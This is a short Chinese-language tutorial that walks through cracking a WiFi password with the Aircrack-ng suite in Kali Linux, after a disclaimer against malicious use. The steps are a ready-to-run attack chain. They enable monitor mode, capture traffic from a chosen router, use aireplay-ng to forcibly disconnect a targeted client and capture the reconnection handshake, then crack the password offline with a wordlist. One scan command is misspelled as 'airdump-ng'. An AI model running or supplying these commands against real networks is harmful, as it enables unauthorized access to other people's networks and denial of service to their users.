近源渗透 | 使用Aircrack-ng破解wifi密码

声明：本人坚决反对利用文章内容进行恶意攻击行为，一切错误行为必将受到惩罚，绿色网络需要靠我们共同维护，推荐大家在了解技术原理的前提下，更好的维护个人信息安全、企业安全、国家安全。

本次实验是在vmware虚拟机中的kali系统下进行的，kali虚拟机中需要使用USB无线网卡RT3070

设置wlan为监听模式

airmon-ng start wlan0   #开启网卡wlan0监听模式
iwconfig                #查看网卡状态，发现wlan0mon，表示已开启成功

探测附近WiFi

airdump-ng wlan0mon

• BSSID 代表路由器的MAC地址；
• PWR 代表信号的强度，数值越大代表信息越强；
• CH 代表信道；
• ENC代表用的加密的方式；
• AUTH 代表认证的方式；
• ESSID是WIFI的名字；

监听路由

sudo airodump-ng -c 8 -w  /home/wifi  --bssid F0:16:28:21:FB:EA  wlan0mon

• -c 信道数
• -w cap存储路径
• -bssid AP mac地址

对目标用户发起攻击使其掉线

对目标用户发起攻击使其掉线，wifi重连，获取一次握手数据包

aireplay-ng -0 5 -a F0:16:28:21:FB:EA -c 04:8C:9A:56:EB:BC wlan0mon

• -0 5 攻击模式 攻击次数
• -a AP mac地址
• -c 用户的 mac地址

数据包重放破解wifi密码

aircrack-ng -w /home/pass.txt -b F0:16:28:21:FB:EA  /home/wifi-01.cap

• -w 密码字典路径
• -b AP mac地址
• 上一步流量包路径